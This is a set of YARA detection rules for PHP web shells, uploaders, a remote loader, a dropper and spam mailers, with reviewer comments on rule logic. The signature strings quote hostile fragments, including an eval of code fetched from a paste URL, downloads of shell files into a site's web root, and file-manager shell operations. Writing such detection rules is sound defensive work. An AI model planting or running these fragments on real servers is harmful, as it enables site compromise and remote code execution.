
/*
   Yara Rule Set
   Author: Brian Laskowski
   Date: 2018-07-14
   Identifier: Tryag-File-Manager-jpeg-master
   Reference: https://github.com/Hestat/lw-yara
*/

/* Rule Set ----------------------------------------------------------------- */

/*
   0up.php - upload stub from the Tryag-File-Manager-jpeg set.

   Only $s1 (the multipart upload form line) is active; the other generated
   strings are kept below as comments. The generated condition had the form
   (magic and size and all of them) or (all of them), which reduces to
   "all of them": the uint16(0) == 0x743c ("<t") and filesize < 1KB checks
   never restricted a match. The condition is written in the reduced form so
   the effective logic is visible.

   NOTE(review): one HTML form line is a thin signature. If it produces false
   positives, re-enabling $s2 or $s4 would tie the match to the upload handler.
*/
rule Tryag_File_Manager_jpeg_master_0up {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file 0up.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "083c429dc1ffeabbd474429b573c40d6f395b1765409fbb9e63c98f05c1fb80d"
   strings:
      $s1 = "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
      //$s2 = "if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }" fullword ascii
      //$s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      //$s4 = "if( $_POST['_upl'] == \"Upload\" ) {" fullword ascii
      //$s5 = "else { echo '<b>Not uploaded ! </b><br><br>'; }" fullword ascii
   condition:
      // Equivalent to the generated condition; see the header comment.
      all of them
}


/*
   up.php - upload stub from the Tryag-File-Manager-jpeg set.

   All five strings are required: the upload form, the copy() of the uploaded
   file under its client-supplied name, the remote script include with the
   look-alike file name jquery.mins.js, the `_upl` POST check and the failure
   message. The generated condition, (magic and size and all of them) or
   (all of them), reduces to "all of them"; the "<t" magic and the 1KB size
   limit never restricted a match.

   NOTE(review): the rule identifier appears to embed a path from the machine
   that generated the rule. It is left unchanged because other tooling may
   refer to the rule by name.
*/
rule _media_brian_88D1_7DB91_infected_07_14_18_Tryag_File_Manager_jpeg_master_up {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file up.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "5bdaa9018e5892715d584d359f2d7eafd528137ec1ac403aafd56662e4bece05"
   strings:
      $s1 = "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
      $s2 = "if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }" fullword ascii
      $s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s4 = "if( $_POST['_upl'] == \"Upload\" ) {" fullword ascii
      $s5 = "else { echo '<b>Not uploaded ! </b><br><br>'; }" fullword ascii
   condition:
      // Equivalent to the generated condition; see the header comment.
      all of them
}

/*
   alexusMailer_v2.0.php - bulk mailer with a remote "shell manager" feature.

   The generated condition was
      (magic "<?" and filesize < 2000KB and 1 of ($x*) and all of them)
      or (all of them)
   which reduces to "all of them": every one of the 20 strings must be
   present, and neither the magic nor the size limit restricted a match.

   NOTE(review): several strings come from bundled front-end libraries rather
   than from the mailer itself ($x4 is Bootstrap's jQuery check, $x7 carries
   jQuery version 1.9.1, $s15/$s17 are the Bootstrap v3.2.0 licence banner).
   Because all strings are required, a copy of the mailer that bundles a
   different library build will not match. The mailer-specific strings are
   $x9-$x12, $s14, $s16, $s18 and $s19; a condition keyed on a subset of those
   would be less brittle, but should be validated against samples first.
*/
rule alexusMailer_v2_0 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file alexusMailer_v2.0.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "82572013074747e079cde069ab95af8b20b597aaf76eeb892dc383a58be24620"
   strings:
      $x1 = "</span><br>\"),$(\"#out_servers\").val($(\"#out_servers\").val()+b.server+\"\\n\")):$(\"#pingout_log\").html(c+\"<span style='co" ascii
      $x2 = "}b.merge(d,s.childNodes),s.textContent=\"\";while(s.firstChild)s.removeChild(s.firstChild);s=f.lastChild}else d.push(t.createTex" ascii
      $x3 = "*/(function(n){function vi(t){var i=this,e=t.target,y=n.data(e,a),p=s[y],w=p.popupName,k=f[w],v,b;if(!i.disabled&&n(e).attr(r)!=" ascii
      $x4 = "if(\"undefined\"==typeof jQuery)throw new Error(\"Bootstrap's JavaScript requires jQuery\");+function(a){\"use strict\";function" ascii
      $x5 = "return(!i||i!==r&&!b.contains(r,i))&&(e.type=o.origType,n=o.handler.apply(this,arguments),e.type=t),n}}}),b.support.submitBubble" ascii
      $x6 = "!function(a,b){\"use strict\";\"function\"==typeof define&&define.amd?define([\"jquery\"],b):\"object\"==typeof exports?module.e" ascii
      $x7 = "(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p=\"1.9.1\",f=c.concat,d=c.push,h=c.slice" ascii
      $x8 = "body{background-color:#fff}.content{margin:0 auto;background-color:#fcf2d4;width:1000px;padding:5px;border:1px solid #000;border" ascii
      $x9 = ": http://serv4.ru/sw.php|c99|login:password<?php endif;?>\"  <?php if(SERVICEMODE):?>readonly<?php endif;?>></textarea><br>" fullword ascii
      $x10 = "\"error\"=>$translation->getWord(\"shell-sheck-test-command-execution-failed\")" fullword ascii
      $x11 = "'shell-sheck-test-command-execution-failed'=>'Test command execution failed'," fullword ascii
      $x12 = "On the Configuration tab of external servers is available quick check of shells, it checks that the addresses are correct, passw" ascii
      $x13 = "ach(function(){d.offsets.push(this[0]),d.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scr" ascii
      $s14 = "\"echo file_get_contents(\\'http://google.com/humans.txt\\');\" " fullword ascii
      $s15 = "* Bootstrap v3.2.0 (http://getbootstrap.com)" fullword ascii
      $s16 = "'shell-sheck-test-command-execution-failed'=>'" fullword ascii
      $s17 = "* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)" fullword ascii
      $s18 = "return $shellManager->exec($type, $url, $code, $data, $pass, isset($login)?$login:null);" fullword ascii
      $s19 = "$answer=$shellManager->exec($type, $url, $testcode, $data, $pass, isset($login)?$login:null);" fullword ascii
      $s20 = "command. Try using the keyboard shortcut or context menu instead.\",f):ut(n,l?l:\"Error executing the \"+i+\" command.\",f))}ret" ascii
   condition:
      // Equivalent to the generated condition; see the header comment.
      all of them
}


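/*
   TryagFileManager3.php - PHP file manager web shell ("Tryag File Manager
   Version 1.1" banner in $s3).

   Matches when the file starts with "<?" (uint16(0) == 0x3f3c), is under
   30KB and contains at least 8 of the strings, or when every string is
   present regardless of header and size.

   The generated rule defined the banner twice ($s3 and $s6 were
   byte-identical), so a single banner hit counted as two of the eight.
   $s6 has been removed so that "8 of them" means eight distinct indicators.
   The remaining identifiers keep their original numbers.

   Most strings are shared with rule shell_php and with the two super rules
   further down, so one file can report under several rule names.
*/
rule TryagFileManager3 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file TryagFileManager3.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
   strings:
      $s1 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s2 = "echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');" fullword ascii
      $s3 = "echo '<br />Tryag File Manager Version <font color=\"red\">1.1</font>, Coded By <font color=\"red\">./ChmoD</font><br />Home: <f" ascii
      $s4 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s5 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      // $s6 removed: it duplicated $s3 byte for byte and double-counted the banner.
      $s7 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s8 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s9 = "<td><center><form method=\\\"POST\\\" action=\\\"?option&path=$pathen\\\">" fullword ascii
      $s10 = "$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];" fullword ascii
      $s11 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      $s12 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s13 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      $s14 = "foreach($_POST as $key=>$value){" fullword ascii
      $s15 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s16 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      $s17 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      $s18 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      $s19 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      $s20 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
   condition:
      ( uint16(0) == 0x3f3c and
         filesize < 30KB and
         ( 8 of them )
      ) or ( all of them )
}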

/*
   leafmailer.php - password-gated PHP bulk mailer.

   Matches when the file starts with "<?" (uint16(0) == 0x3f3c), is under
   400KB, contains $x1 (the password prompt) and at least 4 strings in total,
   or when every string is present regardless of header and size.

   $x1 is itself part of `them`, so "1 of ($x*) and 4 of them" is met by $x1
   plus any three other strings. $s16 repeats the text of $x1 with a longer
   tail and without `fullword`, so the two will usually match together and
   count as two.

   NOTE(review): many of the $s strings appear to be PHPMailer comments and
   code ($s4-$s7, $s10, $s12-$s14, $s17, $s18) or Bootstrap CDN links
   ($s2, $s3) that also occur in legitimate software. $x1 and $s20 (the
   password check on $_REQUEST['pass']) are what tie a match to this tool.
*/
rule leafmailer {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file leafmailer.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "26b6e96b0103e547b08cabb2b0ef1f14acab5b154ffc69a1afc85c8dc47ae029"
   strings:
      $x1 = "print \"<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'>" fullword ascii
      $s2 = "<script src=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js\"></script>" fullword ascii
      $s3 = "<link href=\"https://maxcdn.bootstrapcdn.com/bootswatch/3.3.6/cosmo/bootstrap.min.css\" rel=\"stylesheet\" >" fullword ascii
      $s4 = "* Options are LOGIN (default), PLAIN, NTLM, CRAM-MD5" fullword ascii
      $s5 = "$sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));" fullword ascii
      $s6 = "$sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));" fullword ascii
      $s7 = "$privKeyStr = file_get_contents($this->DKIM_private);" fullword ascii
      $s8 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s9 = "<li>hello <b>[-emailuser-]</b> -> hello <b>user</b></li>" fullword ascii
      $s10 = "$sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));" fullword ascii
      $s11 = "Reciver Email = <b>user@domain.com</b><br>" fullword ascii
      $s12 = "$DKIMb64 = base64_encode(pack('H*', sha1($body))); // Base64 of packed binary SHA-1 hash of body" fullword ascii
      $s13 = "* and creates a plain-text version by converting the HTML." fullword ascii
      $s14 = "* Usually the email address used as the source of the email" fullword ascii
      $s15 = "<li>your code is  <b>[-randommd5-]</b> -> your code is <b>e10adc3949ba59abbe56e057f20f883e</b></li>" fullword ascii
      $s16 = "print \"<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form>" ascii
      $s17 = "* PHPMailer only supports some preset message types," fullword ascii
      $s18 = "* @param string $patternselect A selector for the validation pattern to use :" fullword ascii
      $s19 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>" fullword ascii
      $s20 = "if (isset($_REQUEST['pass']) and $_REQUEST['pass'] == $password) {" fullword ascii
   condition:
      // Gated branch: "<?" header, under 400KB, $x1 plus three more strings.
      // Ungated branch: all 20 strings anywhere in the scanned data.
      ( uint16(0) == 0x3f3c and
         filesize < 400KB and
         ( 1 of ($x*) and 4 of them )
      ) or ( all of them )
}

/*
   x7.php - one-line remote loader.

   $x1 is the whole payload line: a PHP opening tag followed by an eval() of
   content fetched with file_get_contents() from a paste URL. The generated
   condition, (magic "<?" and filesize < 1KB and 1 of ($x*)) or (all of them),
   reduces to "all of them" because $x1 is the only string; the magic and
   size checks never restricted a match.

   NOTE(review): the match is on the exact line including the paste ID, so a
   copy that points at a different URL will not be detected by this rule.
   The rule identifier appears to embed a path from the machine that
   generated the rule; it is left unchanged for compatibility.
*/
rule _media_brian_88D1_7DB91_infected_07_14_18_Tryag_File_Manager_jpeg_master_x7 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file x7.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "6f6af1bc060e8030567dd30b1ec669872b0c4cb4bea3cd333949f6f4a2135acd"
   strings:
      $x1 = "<?php eval(\"?>\".file_get_contents(\"https://pastebin.com/raw/jAqZ3cxT\"));" fullword ascii
   condition:
      // Equivalent to the generated condition; see the header comment.
      all of them
}

/*
   OsComPayLoad.php - dropper script from the Tryag-File-Manager-jpeg set.

   All seven strings are required. $x1 and $x2 are http_get() calls to two
   raw.githubusercontent.com paths, $s3 and $s4 build file paths under
   DOCUMENT_ROOT (wp-content/vuln.php and vuln.htm), and $s5-$s7 belong to the
   curl-based http_get() helper.

   The generated condition,
      (magic "<t" and filesize < 2KB and 1 of ($x*) and all of them)
      or (all of them)
   reduces to "all of them"; the magic and size checks never restricted a
   match.
*/
rule OsComPayLoad {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file OsComPayLoad.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "0827d167971390bc8c718aed98308af04a8276e8ab7839fc51f2b4713a2ee001"
   strings:
      $x1 = "$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');" fullword ascii
      $x2 = "$text = http_get('https://raw.githubusercontent.com/Theanvenger/Tryag-File-Manager-jpeg/master/0up.php');" fullword ascii
      $s3 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/wp-content/vuln.php\" ;" fullword ascii
      $s4 = "$check2 = $_SERVER['DOCUMENT_ROOT'] . \"/vuln.htm\" ;" fullword ascii
      $s5 = "function http_get($url){" fullword ascii
      $s6 = "return curl_exec($im);" fullword ascii
      $s7 = "curl_setopt($im, CURLOPT_HEADER, 0);" fullword ascii
   condition:
      // Equivalent to the generated condition; see the header comment.
      all of them
}

/*
   RUSSIAN-MAILER2018.php - PHP bulk mailer.

   Both active strings must be present; there is no header or size gate.
   $s1 is an ordinary PHP statement, so the distinctive part of the match is
   the variable name in $s2. $s3 and $s4 are kept as disabled candidates.
*/
rule RUSSIAN_MAILER2018 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file RUSSIAN-MAILER2018.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "fc90f92c91ca7b149c9e268053e23e816e49e4613dcf9f09c318882cde8c5ecb"
   strings:
      $s1 = "$message = stripslashes($message);" fullword ascii
      $s2 = "$driv3r = $email[$i];" fullword ascii
      //$s3 = "$subject = $_POST['ssubject'];" fullword ascii
      //$s4 = "$testa = $_POST['veio'];" fullword ascii
   condition:
      all of them
}

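/*
   mail-2018.php - PHP bulk mailer.

   Three strings are active ($s3, $s17, $s20); the rest of the generated set
   is kept below as comments. The generated condition still asked for
   "8 of them" behind a "<?" / 40KB gate. Three strings can never satisfy
   that, so only the trailing "all of them" alternative could ever match
   (some YARA versions may also warn about the unsatisfiable quantifier).
   The condition now states the effective logic directly; the set of files
   that match is unchanged.

   NOTE(review): $s17 (".log{") is a short CSS selector and $s20 is a generic
   mail() call. $s3, the author contact comment, is what makes the
   combination specific. If any disabled strings are re-enabled, choose the
   "N of them" threshold against the new string count.
*/
rule mail_2018 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file mail-2018.php"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "35d176c910d8db75fb752620eec215aa618ba00a74b563d85db5bcd72fc0d710"
   strings:
      //$s1 = "$headers .= \"Content-Transfer-Encoding: \". encodeCTE($XXX['MessgaeEnc']).\"\\n\";" fullword ascii
      //$s2 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s3 = "//contact: https://www.facebook.com/achraf.orion.1//" fullword ascii
      //$s4 = "$headers .= \"Content-Type: text/html; charset=UTF-8\\n\";" fullword ascii
      //$s5 = "echo\"<br>*** (Sleep Mode <font color=green> On</font>) Sleeping <font color=red>$sleep seconds</font>... Done ***\";" fullword ascii
      //$s6 = "echo \"<br>$n - Sending... => $taz => <b> <font color=red> Error</font></b>\";" fullword ascii
      //$s7 = "var el = document.getElementById(\"hdlog\");" fullword ascii
      //$s8 = "<a class=\"navbar-brand\" href=\"http://<?= $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']?>\">" fullword ascii
      //$s9 = "<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\">" fullword ascii
      //$s10 = "<input class=\"form-control input\" name=\"subject\"  placeholder=\"Subject\" required=\"\" type=\"text\" autocomplete=\"off\">" fullword ascii
      //$s11 = "<input class=\"form-control input\" name=\"subject\"  placeholder=\"Subject\" required=\"\" type=\"text\" autocomplete=\"" fullword ascii
      //$s12 = "str.length > 0 ? el.innerHTML += str.shift() : clearTimeout(running); " fullword ascii
      //$s13 = "<input class=\"form-control input\" name=\"email\" placeholder=\"Email\" required=\"\"\" type=\"text\" autocomplete=\"off\">" fullword ascii
      //$s14 = "<input class=\"form-control input\" name=\"email\" placeholder=\"Email\" required=\"\"\" type=\"text\" autocomplete=\"off\"" fullword ascii
      //$s15 = "<link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\" integrity=\"sha3" ascii
      //$s16 = "<input class=\"form-control input\" name=\"name\" placeholder=\"Name\" type=\"text\" autocomplete=\"off\">" fullword ascii
      $s17 = ".log{" fullword ascii
      //$s18 = "$headers .= \"MIME-Version: 1.0\\n\";" fullword ascii
      //$s19 = "$headers .= \"X-Priority: \".$XXX['Priority'].\"\\n\";" fullword ascii
      $s20 = "if (mail($taz, $subj, $mess, $headers)){" fullword ascii
   condition:
      // All three active strings; the former "8 of them" branch was unreachable.
      all of them
}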

/*
   shell.php.pjpeg - PHP file manager web shell stored under a double
   extension.

   Matches when the file starts with "<?" (uint16(0) == 0x3f3c), is under
   30KB and contains at least 8 of the 20 strings, or when all 20 strings are
   present regardless of header and size.

   Most strings also appear in rule TryagFileManager3 and in the super rules
   further down, so one file can report under several rule names.

   NOTE(review): the identifier `shell_php` is generic. YARA rejects duplicate
   rule identifiers within one compilation, so check for a name clash before
   merging this file with other rule sets.
*/
rule shell_php {
   meta:
      description = "Tryag-File-Manager-jpeg-master - file shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      $s1 = "echo '<br />Coded by -_- janina</font>" fullword ascii
      $s2 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s3 = "<script type=\"text/javascript\" src=\"http://www.codejquery.net/jquery.mins.js\" ></script>" fullword ascii
      $s4 = "echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');" fullword ascii
      $s5 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      $s6 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s7 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s8 = "<td><center><form method=\\\"POST\\\" action=\\\"?option&path=$path\\\">" fullword ascii
      $s9 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      $s10 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s11 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      $s12 = "foreach($_POST as $key=>$value){" fullword ascii
      $s13 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s14 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      $s15 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      $s16 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      $s17 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      $s18 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
      $s19 = "echo '</table><br /><center>'.$_POST['path'].'<br /><br />';" fullword ascii
      $s20 = "echo '<font color=\"red\">Change Permission Error.</font><br />';" fullword ascii
   condition:
      // Gated branch: "<?" header, under 30KB, any 8 strings.
      // Ungated branch: all 20 strings anywhere in the scanned data.
      ( uint16(0) == 0x3f3c and
         filesize < 30KB and
         ( 8 of them )
      ) or ( all of them )
}

/* Super Rules ------------------------------------------------------------- */

/*
   Super rule: strings common to TryagFileManager.php, TryagFileManager3.php
   and shell.php.pjpeg (hash1-hash3).

   The strings are the file manager's status messages and its $_POST-driven
   operations (rename, chmod, unlink, rmdir, fopen for writing, upload).
   Matches when the file starts with "<?" (uint16(0) == 0x3f3c), is under
   80KB and contains at least 8 of the 20 strings, or when all 20 are present
   regardless of header and size.

   hash2 and hash3 are also covered by the per-file rules TryagFileManager3
   and shell_php, so those samples will report under more than one rule name.
*/
rule _TryagFileManager_TryagFileManager3_shell_php_0 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - from files TryagFileManager.php, TryagFileManager3.php, shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "e32a7a80127f4d5be15a811c9f52b0698f2b73e5d65d48808462b074b9131856"
      hash2 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
      hash3 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      $s1 = "New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.$_POST['name'].'\" />" fullword ascii
      $s2 = "echo '<font color=\"red\">File Upload Error.</font><br />';" fullword ascii
      $s3 = "echo '<font color=\"green\">File Upload Done.</font><br />';" fullword ascii
      $s4 = "foreach($_POST as $key=>$value){" fullword ascii
      $s5 = "$_POST[$key] = stripslashes($value);" fullword ascii
      $s6 = "echo '<font color=\"red\">Change Permission Error.</font><br />';" fullword ascii
      $s7 = "echo '<font color=\"red\">Delete File Error.</font><br />';" fullword ascii
      $s8 = "echo '<font color=\"red\">Edit File Error.</font><br />';" fullword ascii
      $s9 = "echo '<font color=\"red\">Change Name Error.</font><br />';" fullword ascii
      $s10 = "echo '<font color=\"red\">Delete Dir Error.</font><br />';" fullword ascii
      $s11 = "}elseif($_POST['opt'] == 'rename'){" fullword ascii
      $s12 = "$_POST['name'] = $_POST['newname'];" fullword ascii
      $s13 = "}elseif($_POST['type'] == 'file'){" fullword ascii
      $s14 = "$fp = fopen($_POST['path'],'w');" fullword ascii
      $s15 = "if($_POST['opt'] == 'chmod'){" fullword ascii
      $s16 = "echo '<form method=\"POST\">" fullword ascii
      $s17 = "if(rmdir($_POST['path'])){" fullword ascii
      $s18 = "if(unlink($_POST['path'])){" fullword ascii
      $s19 = "echo '<font color=\"green\">Change Permission Done.</font><br />';" fullword ascii
      $s20 = "Upload File : <input type=\"file\" name=\"file\" />" fullword ascii
   condition:
      // Gated branch: "<?" header, under 80KB, any 8 strings.
      // Ungated branch: all 20 strings anywhere in the scanned data.
      ( uint16(0) == 0x3f3c and
        filesize < 80KB and ( 8 of them )
      ) or ( all of them )
}

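/*
   Super rule: strings common to TryagFileManager3.php and shell.php.pjpeg
   (hash1, hash2).

   Two strings are active ($s2, $s3); the rest of the generated set is kept
   below as comments. The generated condition still asked for "8 of them"
   behind a "<?" / 30KB gate. Two strings can never satisfy that, so only the
   trailing "all of them" alternative could ever match (some YARA versions
   may also warn about the unsatisfiable quantifier). The condition now
   states the effective logic directly; the set of files that match is
   unchanged.

   NOTE(review): both active strings also appear in the per-file rules
   TryagFileManager3 and shell_php, so this rule mainly adds coverage for
   variants that keep the table layout and the is_writable() colouring line
   but differ elsewhere. If disabled strings are re-enabled, choose the
   "N of them" threshold against the new string count.
*/
rule _TryagFileManager3_shell_php_1 {
   meta:
      description = "Tryag-File-Manager-jpeg-master - from files TryagFileManager3.php, shell.php.pjpeg"
      author = "Brian Laskowski"
      reference = "https://github.com/Hestat/lw-yara"
      date = "2018-07-14"
      hash1 = "3cf5af7774d1dc7ca7b58d9d6899ef307eabb9ed9b66d4ef0eb44cd346135bd8"
      hash2 = "cb2241fd794aaff55b354114d1447e3e6411619ca257316807cb6d0d59651021"
   strings:
      //$s1 = "<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />" fullword ascii
      $s2 = "echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      $s3 = "if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo '</font>';" fullword ascii
      //$s4 = "<input type=\"hidden\" name=\"path\" value=\"'.$_POST['path'].'\">" fullword ascii
      //$s5 = "if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo '</font>';" fullword ascii
      //$s6 = "}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){" fullword ascii
      //$s7 = "if(isset($_GET['option']) && $_POST['opt'] == 'delete'){" fullword ascii
      //$s8 = "echo '<form enctype=\"multipart/form-data\" method=\"POST\">" fullword ascii
      //$s9 = "if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){" fullword ascii
      //$s10 = "echo '</table><br /><center>'.$_POST['path'].'<br /><br />';" fullword ascii
      //$s11 = "elseif(!is_readable(\"$path/$dir\")) echo '<font color=\"red\">';" fullword ascii
      //$s12 = "elseif(!is_readable(\"$path/$file\")) echo '<font color=\"red\">';" fullword ascii
      //$s13 = "if(rename($_POST['path'],$path.'/'.$_POST['newname'])){" fullword ascii
      //$s14 = "if(chmod($_POST['path'],$_POST['perm'])){" fullword ascii
      //$s15 = "<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">" fullword ascii
      //$s16 = "}elseif($_POST['opt'] == 'edit'){" fullword ascii
      //$s17 = "Permission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'\" />" ascii
      //$s18 = "if(isset($_GET['path'])){" fullword ascii
      //$s19 = "if(fwrite($fp,$_POST['src'])){" fullword ascii
      //$s20 = "<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">" fullword ascii
   condition:
      // Both active strings; the former "8 of them" branch was unreachable.
      all of them
}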

